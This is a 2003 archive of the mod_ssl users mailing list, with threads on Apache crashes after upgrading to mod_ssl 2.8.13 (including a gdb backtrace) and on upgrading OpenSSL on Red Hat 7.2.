> [Wed Mar 19 16:21:17 2003] [notice] child pid 11412 exit signal
> Segmentation Fault (11)
> 
> This problem does not exist with mod_ssl/2.8.12 and the same version of
> php
> 
> thanks in advance
> 
> -sophia
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 16:47:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 721F52AA049; Thu, 20 Mar 2003 16:47:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ejk.cso.uiuc.edu (ejk.cso.uiuc.edu [130.126.113.8])
	by master.modssl.org (Postfix) with SMTP id 838B12AA015
	for ; Thu, 20 Mar 2003 16:47:10 +0100 (CET)
Received: (qmail 12669 invoked from network); 20 Mar 2003 15:47:06 -0000
Received: from ejk.cso.uiuc.edu (130.126.113.8)
  by ejk.cso.uiuc.edu with SMTP; 20 Mar 2003 15:47:03 -0000
Date: Thu, 20 Mar 2003 09:47:03 -0600
From: Ed Kubaitis 
To: modssl-users@modssl.org
Subject: RE: mod_ssl/2.8.13 and php
Message-ID: <148670000.1048175223@localhost.localdomain>
X-Mailer: Mulberry/3.0.1 (Linux/x86)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-Spam-Status: No, hits=-1.6 required=5.0
	tests=EMAIL_ATTRIBUTION,QUOTED_EMAIL_TEXT,SPAM_PHRASE_00_01
	version=2.43
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Kubaitis 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I see the problem with

   Apache/1.3.27
   mod_ssl/2.8.13
   (no other optional Apache modules except mod_rewrite)
   OpenSSL/0.9.7a
   Red Hat Linux 7.3 system

I tried OpenSSL 0.9.7a both with and without the RSA
blinding patch distributed by Ben Laurie and saw the
problem both times.

I see no problems with modssl 2.8.12 and OpenSSL 0.9.7a
-- either with or without the Ben Laurie patch.

I have made the error_log and ssl_engine_log for the
failure with 2.8.13 available at

  http://ejk.cso.uiuc.edu/modssl-2.8.13-logs/

--
Ed Kubaitis - ejk@uiuc.edu
CITES/STS - University of Illinois at Urbana-Champaign


Burkhard Ulric wrote:

> I have this Problems with:
>
> Apache/1.3.27 mod_gzip/1.3.26.1a PHP/4.3.1 mod_ssl/2.8.13 OpenSSL/0.9.7a
>
> Requesting Pages without ssl encryption works fine but requesting this
> Pages with encryption causes segfault on every request.
>
> There are no Problems with  2.8.12
>
> Regards
>
> Burkhard
>
>
> On Wed, 19 Mar 2003, Frye, David wrote:
>
>> I had the same problem but without using PHP.  Ended up reverting back
>> to 2.8.12 \ until I (or someone else) can figure it out.  It will also
>> install the snakeoil \ certificates even if I specifiy the path to an
>> existing cert.  -----Original Message-----
>> From: Sophia Petridou [mailto:spetrido@ccf.auth.gr]
>> Sent: Wednesday, March 19, 2003 9:39 AM
>> To: modssl-users@modssl.org
>> Subject: mod_ssl/2.8.13 and php
>>
>>
>> Hello all,
>>
>> SERVER: Apache 1.3.27 + mod_ssl/2.8.13 + PHP/4.3.1
>>
>> I have just installed mod_ssl/2.8.13 and my server
>> has started without problems.
>> (config command: ./configure  --with-apxs=/usr/local/apache/bin/apxs
>> --with-ssl=/usr/local/ssl --with-mm=/usr/local/include)
>>
>> The requests about html files or server-status and server-info pages
>> are ok. But, when I request a php file (/php3-info.php3) I get the
>> message
>> 'The page cannot be displayed'. These are the entries in my error log
>> file:
>> [Wed Mar 19 16:10:31 2003] [notice] child pid 11411 exit signal
>> Segmentation Fault (11)
>> [Wed Mar 19 16:10:33 2003] [notice] child pid 11414 exit signal
>> Segmentation Fault (11)
>> [Wed Mar 19 16:20:54 2003] [notice] child pid 11413 exit signal
>> Segmentation Fault (11)
>> [Wed Mar 19 16:21:04 2003] [notice] child pid 11415 exit signal
>> Segmentation Fault (11)
>> [Wed Mar 19 16:21:17 2003] [notice] child pid 11412 exit signal
>> Segmentation Fault (11)
>>
>> This problem does not exist with mod_ssl/2.8.12 and the same version of
>> php
>>
>> thanks in advance
>>
>> -sophia
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 17:34:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EF51B2AA04B; Thu, 20 Mar 2003 17:34:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sottmxssm.entrust.com (sottmxssm.entrust.com [216.191.252.10])
	by master.modssl.org (Postfix) with ESMTP id 4F79D2AA049
	for ; Thu, 20 Mar 2003 17:34:11 +0100 (CET)
Received: from SOTTMXS01.entrust.com (sottmxs01.entrust.com [10.4.61.7])
	by sottmxssm.entrust.com (Switch-2.2.5/Switch-2.2.4) with ESMTP id V2KG0VOY18474
	for ; Thu, 20 Mar 2003 11:31:24 -0500
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Thu, 20 Mar 2003 11:34:06 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: openssl upgrade
Date: Thu, 20 Mar 2003 11:34:01 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On a linux 7.2 system, would it be easy to upgrade the current version of
OpenSSL to the most recent?
Are there any directions for this?

Thanks
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 17:45:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CA3B92AA049; Thu, 20 Mar 2003 17:45:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id D21E42AA015
	for ; Thu, 20 Mar 2003 17:44:58 +0100 (CET)
Received: from rocky (207.175.219.206:1609)
	by beaucox.com with [XMail 1.14 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Thu, 20 Mar 2003 06:44:51 -1000
From: beau@beaucox.com
To: "'modssl-users@modssl.org'" 
Date: Thu, 20 Mar 2003 06:44:51 -1000
MIME-Version: 1.0
Subject: Re: openssl upgrade
Message-ID: <3E796363.11206.124305E@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: beau@beaucox.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 20 Mar 2003 at 11:34, Robert Lagana wrote:

> 
> On a linux 7.2 system, would it be easy to upgrade the current version of
> OpenSSL to the most recent?
> Are there any directions for this?
> 
> Thanks

linux 7.2 what? (RedHat, SuSE, etc.)

Aloha => Beau;


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 17:50:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 059BD2AA049; Thu, 20 Mar 2003 17:50:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sottmxssm.entrust.com (sottmxssm.entrust.com [216.191.252.10])
	by master.modssl.org (Postfix) with ESMTP id 586132AA015
	for ; Thu, 20 Mar 2003 17:50:25 +0100 (CET)
Received: from SOTTMXS01.entrust.com (sottmxs01.entrust.com [10.4.61.7])
	by sottmxssm.entrust.com (Switch-2.2.5/Switch-2.2.4) with ESMTP id V2KG3B3Y20448
	for ; Thu, 20 Mar 2003 11:47:39 -0500
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Thu, 20 Mar 2003 11:50:21 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: openssl upgrade
Date: Thu, 20 Mar 2003 11:50:19 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Linux 7.2 RedHat
Pentium

-----Original Message-----
From: beau@beaucox.com [mailto:beau@beaucox.com]
Sent: Thursday, March 20, 2003 11:45 AM
To: 'modssl-users@modssl.org'
Subject: Re: openssl upgrade


On 20 Mar 2003 at 11:34, Robert Lagana wrote:

> 
> On a linux 7.2 system, would it be easy to upgrade the current version of
> OpenSSL to the most recent?
> Are there any directions for this?
> 
> Thanks

linux 7.2 what? (RedHat, SuSE, etc.)

Aloha => Beau;


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 18:42:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8B2962AA049; Thu, 20 Mar 2003 18:42:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web40305.mail.yahoo.com (web40305.mail.yahoo.com [66.218.78.84])
	by master.modssl.org (Postfix) with SMTP id B5C8C2AA015
	for ; Thu, 20 Mar 2003 18:42:32 +0100 (CET)
Message-ID: <20030320174228.72608.qmail@web40305.mail.yahoo.com>
Received: from [200.188.162.182] by web40305.mail.yahoo.com via HTTP; Thu, 20 Mar 2003 14:42:28 ART
Date: Thu, 20 Mar 2003 14:42:28 -0300 (ART)
From: =?iso-8859-1?q?Jazz?= 
Subject: Problem with 2.8.13 and Solaris 2.6
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Jazz?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

    Hy,

    I compiled the latest mod_ssl 2.8.13+OpenSSL
0.9.6i with apache 1.3.27 and I had some problems...
the http apache works fine, but the https server dies
when a request is received. error_log reports this:

[notice] child pid 19396 exit signal Bus Error (10)

The main process still running, but the child
processes doesn't seem to stay up. Anyone had a
problem like this? This problem is just with Solaris
2.6/Sparc or is happening in other platforms?

Thank you all for your attention.

Jazz

_______________________________________________________________________
Busca Yahoo!
O serviço de busca mais completo da Internet. O que você pensar o Yahoo! encontra.
http://br.busca.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 18:47:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B2FAA2AA049; Thu, 20 Mar 2003 18:47:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vulcan.bascom.com (vulcan.bascom.com [69.18.148.68])
	by master.modssl.org (Postfix) with ESMTP id 161C62AA015
	for ; Thu, 20 Mar 2003 18:47:47 +0100 (CET)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id h2KHlcJ27227
	for modssl-users@modssl.org; Thu, 20 Mar 2003 12:47:38 -0500
Received: from dcomo2000 (sandstorm-red.bascom.com [69.18.165.2])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id h2KHlYN27169
	for ; Thu, 20 Mar 2003 12:47:34 -0500
From: "Drew J. Como" 
To: 
Subject: RE: openssl upgrade
Date: Thu, 20 Mar 2003 12:50:09 -0500
Message-ID: <001601c2ef09$2715a7f0$13013c0a@dcomo2000>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
In-Reply-To: 
Importance: Normal
X-Spam-Status: No, hits=-101.0 required=7.0
	tests=CLICK_BELOW,EMAIL_ATTRIBUTION,IN_REP_TO,SPAM_PHRASE_03_05,
	      USER_AGENT_OUTLOOK,USER_IN_WHITELIST
	version=2.42
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Beau,

The easiest way to upgrade is to simply install the latest
RPM for your distibution.  These are free downloads and
can be easily obtained by going to www.redhat.com.

Here is something easier for you.  Click on the link below
and simply download the patch for the appropriate OS:

https://rhn.redhat.com/errata/RHSA-2003-062.html

Download the package and then install it using the following
command:

	rpm -Uvh [nameofpackage.rpm]

Enjoy :-)

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed."  

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Robert Lagana
Sent: Thursday, March 20, 2003 11:50 AM
To: 'modssl-users@modssl.org'
Subject: RE: openssl upgrade


Linux 7.2 RedHat
Pentium

-----Original Message-----
From: beau@beaucox.com [mailto:beau@beaucox.com]
Sent: Thursday, March 20, 2003 11:45 AM
To: 'modssl-users@modssl.org'
Subject: Re: openssl upgrade


On 20 Mar 2003 at 11:34, Robert Lagana wrote:

> 
> On a linux 7.2 system, would it be easy to upgrade the current version of
> OpenSSL to the most recent?
> Are there any directions for this?
> 
> Thanks

linux 7.2 what? (RedHat, SuSE, etc.)

Aloha => Beau;


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 19:02:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88AEF2AA049; Thu, 20 Mar 2003 19:02:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id A61B92AA015
	for ; Thu, 20 Mar 2003 19:02:22 +0100 (CET)
Received: from rocky (207.175.219.206:2675)
	by beaucox.com with [XMail 1.14 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Thu, 20 Mar 2003 08:02:16 -1000
From: beau@beaucox.com
To: "'modssl-users@modssl.org'" 
Date: Thu, 20 Mar 2003 08:02:05 -1000
MIME-Version: 1.0
Subject: RE: openssl upgrade
Message-ID: <3E79757D.25848.16AE6BA@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: beau@beaucox.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 20 Mar 2003 at 11:50, Robert Lagana wrote:

> Linux 7.2 RedHat
> Pentium
> 
> -----Original Message-----
> From: beau@beaucox.com [mailto:beau@beaucox.com]
> Sent: Thursday, March 20, 2003 11:45 AM
> To: 'modssl-users@modssl.org'
> Subject: Re: openssl upgrade
> 
> 
> On 20 Mar 2003 at 11:34, Robert Lagana wrote:
> 
> > 
> > On a linux 7.2 system, would it be easy to upgrade the current version of
> > OpenSSL to the most recent?
> > Are there any directions for this?
> > 
> > Thanks
> 
> linux 7.2 what? (RedHat, SuSE, etc.)
> 
> Aloha => Beau;
> 

Hi -

It should not be too hard (but I am not
using RedHat):

1) read http://www.openssl.org/support/faq.html
   Note the RedHat sections.

2) download the latest (0.9.7a) to some dir
   (I use something like /usr/local/src/openssl).

3) untar it and check its signature (see faq).

4) read the following in the expanded dir:
   FAQ and INSTALL and/or INSTALL.whatever

5) make you choices and do a
    ./config --whatever=whatever \
      ...
    make
    make test

6) if OK, you have proved you can get
   openssl compiled and tested from source.

7) now is the tricky part; examine your current
   installed openssl, determine it's location,
   and, if you are sure you know what's what,
   remove it with rpm (man rpm if ?s). I assume
   you can always revert to the RedHat version
   by re-installing the 'official' RedHat
   openssl rpm. (I hope you are doing this on
   a test machine.)

8) make location changes (prefix=....) (if
   necessary) and repeat from step 4.

9) make install and ldconfig.

10)test and, etc.

Aloha => Beau;

PS: please remember that every distro has it's
own quirks; you eventually will have to fight
through them on your own - and, yes, it gets
easier and easier as you install more and more
packages. Good luck!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 19:17:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44CFA2AA049; Thu, 20 Mar 2003 19:17:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 533D02AA015
	for ; Thu, 20 Mar 2003 19:17:49 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA11093;
	Thu, 20 Mar 2003 13:16:26 -0500
Date: Thu, 20 Mar 2003 13:16:25 -0500 (EST)
From: "R. DuFresne" 
To: beau@beaucox.com
Cc: "'modssl-users@modssl.org'" 
Subject: RE: openssl upgrade
In-Reply-To: <3E79757D.25848.16AE6BA@localhost>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 20 Mar 2003 beau@beaucox.com wrote:


	[SNIP]

> 
> It should not be too hard (but I am not
> using RedHat):
> 
> 1) read http://www.openssl.org/support/faq.html
>    Note the RedHat sections.
> 
> 2) download the latest (0.9.7a) to some dir
>    (I use something like /usr/local/src/openssl).
> 
> 3) untar it and check its signature (see faq).
> 
> 4) read the following in the expanded dir:
>    FAQ and INSTALL and/or INSTALL.whatever
> 
> 5) make you choices and do a
>     ./config --whatever=whatever \
>       ...
>     make
>     make test
> 
> 6) if OK, you have proved you can get
>    openssl compiled and tested from source.
> 
> 7) now is the tricky part; examine your current
>    installed openssl, determine it's location,
>    and, if you are sure you know what's what,
>    remove it with rpm (man rpm if ?s). I assume
>    you can always revert to the RedHat version
>    by re-installing the 'official' RedHat
>    openssl rpm. (I hope you are doing this on
>    a test machine.)
> 

and get the sources and recompile all red-hat apps that rely upon openssl.
There are others on the list that might beable to document what those
applications are, but, I believe there are a few.

> 8) make location changes (prefix=....) (if
>    necessary) and repeat from step 4.
> 
> 9) make install and ldconfig.
> 
> 10)test and, etc.
> 

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 20:28:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F17872AA049; Thu, 20 Mar 2003 20:28:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from blade.devel.redhat.com (nat-pool-rdu.redhat.com [66.187.233.200])
	by master.modssl.org (Postfix) with ESMTP id 6105E2AA034
	for ; Thu, 20 Mar 2003 20:28:27 +0100 (CET)
Received: from blade.devel.redhat.com (localhost.localdomain [127.0.0.1])
	by blade.devel.redhat.com (8.12.8/8.12.8) with ESMTP id h2KJSNQL008855
	for ; Thu, 20 Mar 2003 14:28:23 -0500
Received: (from nalin@localhost)
	by blade.devel.redhat.com (8.12.8/8.12.8/Submit) id h2KJSMLP008853
	for modssl-users@modssl.org; Thu, 20 Mar 2003 14:28:22 -0500
Date: Thu, 20 Mar 2003 14:28:22 -0500
From: Nalin Dahyabhai 
To: modssl-users@modssl.org
Subject: Re: openssl upgrade
Message-ID: <20030320192822.GA8839@redhat.com>
References: <3E79757D.25848.16AE6BA@localhost> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
X-Random-Fortune: People in general do not willingly read if they have anything else to amuse them.  -- S. Johnson
Organization: Red Hat, Inc.
X-Department: OS Development
X-Disclaimer: I am not a spokesmodel.  Views expressed are my own.
X-Key-ID: 78688BF5
X-Key-Fingerprint: 60BC AD87 AF51 3A00 8C99  0388 379B CE57 7868 8BF5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nalin Dahyabhai 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Mar 20, 2003 at 01:16:25PM -0500, R. DuFresne wrote:
> and get the sources and recompile all red-hat apps that rely upon openssl.
> There are others on the list that might beable to document what those
> applications are, but, I believe there are a few.

You can make that list by finding which version of libcrypto the default
openssl package installs:

  nalin@blade:~> rpm -q --provides openssl | grep libcrypto
  libcrypto.so.2

and then by checking which packages require that shared library:

  nalin@blade:~> rpm -q --whatrequires libcrypto.so.2

Cheers,

Nalin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 20:29:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E835C2AA04D; Thu, 20 Mar 2003 20:29:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bastion.pydo.net (bastion.pydo.net [62.212.97.116])
	by master.modssl.org (Postfix) with ESMTP id B73712AA049
	for ; Thu, 20 Mar 2003 20:29:02 +0100 (CET)
Received: by bastion.pydo.net (Postfix, from userid 10025)
	id BEF564C25F; Thu, 20 Mar 2003 20:28:58 +0100 (CET)
Received: from pydo.org (univers2.pydo.org [192.168.0.4])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by bastion.pydo.net (Postfix) with ESMTP id EEAE74C259
	for ; Thu, 20 Mar 2003 20:28:52 +0100 (CET)
Message-ID: <3E7A1682.5050301@pydo.org>
Date: Thu, 20 Mar 2003 20:29:06 +0100
From: Artur Pydo 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: RE: mod_ssl/2.8.13 and php
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com>
In-Reply-To: <20030320174228.72608.qmail@web40305.mail.yahoo.com>
X-Enigmail-Version: 0.71.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, hits=-14.5 required=5.0
	tests=AWL,IN_REP_TO,REFERENCES,USER_AGENT_MOZILLA_UA
	autolearn=ham	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Artur Pydo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I can see the same segmentation fault :

FreeBSD 4.8-STABLE
Apache 1.3.27
Openssl 0.9.7a
Modssl 2.8.13
PHP 4.3.1 / PHP 4.3.2RC1 / PHP 4.3.2-snapshot

It happens both with static compilation and as DSO.

The backtrace seems pointing out an error in
ssl_var_lookup_ssl_cert().

This problem only appears with PHP compiled in and
asking for a .php document. I mean asking for a html
document works fine.

Backtrace (sorry for the formatting) :

Program received signal SIGSEGV, Segmentation fault.
0x283a6e9a in ssl_var_lookup_ssl_cert () from 
/usr/local/apache/libexec/libssl.so
(gdb) bt
#0  0x283a6e9a in ssl_var_lookup_ssl_cert () from 
/usr/local/apache/libexec/libssl.so
#1  0x283a6d49 in ssl_var_lookup_ssl () from 
/usr/local/apache/libexec/libssl.so
#2  0x283a6291 in ssl_var_lookup () from /usr/local/apache/libexec/libssl.so
#3  0x283a11c8 in ssl_hook_Fixup () from /usr/local/apache/libexec/libssl.so
#4  0x805472b in run_method (r=0x815d034, offset=29, run_all=1) at 
http_config.c:370
#5  0x805480a in ap_run_fixups (r=0x815d034) at http_config.c:397
#6  0x806a7cc in process_request_internal (r=0x815d034) at 
http_request.c:1303
#7  0x806a866 in ap_process_request (r=0x815d034) at http_request.c:1324
#8  0x80610eb in child_main (child_num_arg=0) at http_main.c:4689
#9  0x80612cd in make_child (s=0x80b0034, slot=0, now=1048177481) at 
http_main.c:4813
#10 0x8061446 in startup_children (number_to_start=5) at http_main.c:4895
#11 0x8061a74 in standalone_main (argc=5, argv=0xbfbffb04) at 
http_main.c:5203
#12 0x80622f0 in main (argc=5, argv=0xbfbffb04) at http_main.c:5566
#13 0x804f4b1 in _start ()

-- 

Best regards,

Artur Pydo.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 23:07:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 11F992AA049; Thu, 20 Mar 2003 23:07:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (imap.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id BEFF82AA015
	for ; Thu, 20 Mar 2003 23:07:09 +0100 (CET)
Received: (qmail 31885 invoked by uid 0); 20 Mar 2003 22:07:05 -0000
Received: from pD9E48C61.dip.t-dialin.net (HELO pinetik) (217.228.140.97)
  by mail.gmx.net (mp015-rz3) with SMTP; 20 Mar 2003 22:07:05 -0000
From: "Philipp Roos" 
To: 
Subject: Apache crashed if a SSL Engnie is on
